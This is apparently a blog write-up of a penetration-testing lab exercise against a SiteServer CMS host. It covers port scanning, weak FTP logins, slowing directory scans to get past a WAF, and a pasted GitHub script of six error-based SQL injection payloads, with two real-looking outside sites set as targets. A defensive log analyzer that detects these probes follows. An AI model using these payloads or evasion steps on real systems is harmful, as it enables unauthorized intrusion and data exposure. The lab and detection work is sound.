Project 7

Information gathering

  1. IP lookup


  2. Port scan


Web penetration testing

A reverse IP lookup can be used to find the domain name; it turns out to be www.moonlab.com

Edit the hosts file


Port 21


Try weak credentials

Try anonymous login


Port 80

Visit port 80


  1. Try directory brute-forcing

    Nothing of value

  2. A WebDAV privilege-escalation vulnerability may exist

  3. A WAF is present


    Probably Safedog (安全狗); the directory scan rate was too high, so the scanner got blocked

  4. The thread count can be lowered

    Add a sleep delay

  5. Directory scanning turned up SiteServer

    Tried weak passwords -> failed

    Look for an nday

    Found a detection script on GitHub

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # Author: 404
    # Name: SiteServer 3.6.4 (latest) SQL injection vulnerability bundle, part 1
    # Refer: http://www.wooyun.org/corps/%E7%99%BE%E5%AE%B9%E5%8D%83%E5%9F%9F%E8%BD%AF%E4%BB%B6%E6%8A%80%E6%9C%AF%E5%BC%80%E5%8F%91%E6%9C%89%E9%99%90%E8%B4%A3%E4%BB%BB%E5%85%AC%E5%8F%B8/page/2
    # curl and security_hole are supplied by the scanner framework (the dummy module when run directly).


    def assign(service, arg):
        # Plugin entry point: only handle targets identified as SiteServer.
        if service == "siteserver":
            return True, arg


    def audit(arg):
        # Error-based probes: each concatenates char(71)..char(73) ("GAOJI") with @@version,
        # so a vulnerable backend answers HTTP 500 with "GAOJIMicrosoft..." in the body.
        ps = [
            'siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',
            'usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',
            'siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',
            'siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',
            'siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',
            'siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',
        ]
        for p in ps:
            url = arg + p
            code, head, res, errcode, _ = curl.curl2(url)

            if code == 500 and "GAOJIMicrosoft" in res:
                security_hole(url)


    if __name__ == "__main__":
        from dummy import *
        audit(assign('siteserver', 'http://www.plhgyy.com/')[1])
        #audit(assign('siteserver', 'http://www.zgktws.com/')[1])

    Try rewriting it in Go
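Added here as a defender-side example (not part of the original writeup or the GitHub script): a small access-log analyzer that flags the two behaviours this section describes, the burst of 404s from directory brute-forcing that tripped the WAF and the error-based SQL probes the script sends, by URL-decoding each request's query string before matching. The log lines, client IPs and thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Constructed sample access log (common log format); not captured from the lab host.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jun/2024:00:10:01 +0800] "GET /admin/ HTTP/1.1" 404 153
10.0.0.5 - - [28/Jun/2024:00:10:01 +0800] "GET /backup/ HTTP/1.1" 404 153
10.0.0.5 - - [28/Jun/2024:00:10:02 +0800] "GET /test/ HTTP/1.1" 404 153
10.0.0.5 - - [28/Jun/2024:00:10:02 +0800] "GET /old/ HTTP/1.1" 404 153
10.0.0.9 - - [28/Jun/2024:00:12:40 +0800] "GET /siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271 HTTP/1.1" 500 2210
10.0.0.7 - - [28/Jun/2024:00:15:00 +0800] "GET /siteserver/login.aspx HTTP/1.1" 200 5120
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Error-based MSSQL probe as the script sends it: char()+char()+... with @@version, or convert(int, <string>).
SQLI_RE = re.compile(r"(?i)(@@version|convert\s*\(\s*int\s*,|(?:char\(\d+\)\s*\+\s*){2,})")

def parse_line(line):
    # Returns client IP, timestamp, request target and status, or None for an unparsable line.
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, status = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), "target": target, "status": int(status)}

def analyze(log_text, burst_count=4, window_seconds=5):
    # Returns (kind, client_ip, detail, severity) tuples.
    findings, not_found = [], defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        # Decode the query once so %27 / %2B become ' / + before the signature is applied.
        parts = urlsplit(rec["target"])
        if SQLI_RE.search(unquote(parts.query)):
            # A 500 on such a request is exactly what the script treats as a vulnerable response.
            severity = "high" if rec["status"] == 500 else "medium"
            findings.append(("sqli_probe", rec["ip"], parts.path, severity))
        if rec["status"] == 404:
            not_found[rec["ip"]].append(rec["time"])
    # Rate check: burst_count or more 404s from one client inside a sliding window (the scan pattern the WAF blocked).
    window = timedelta(seconds=window_seconds)
    for ip, times in not_found.items():
        times.sort()
        for i in range(len(times) - burst_count + 1):
            if times[i + burst_count - 1] - times[i] <= window:
                findings.append(("dir_bruteforce", ip, f"{burst_count}+ 404s within {window_seconds}s", "medium"))
                break
    return findings
```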


Project 7
https://tsy244.github.io/2024/06/27/靶场记录/项目7/
Author: August Rosenberg
Posted on: June 27, 2024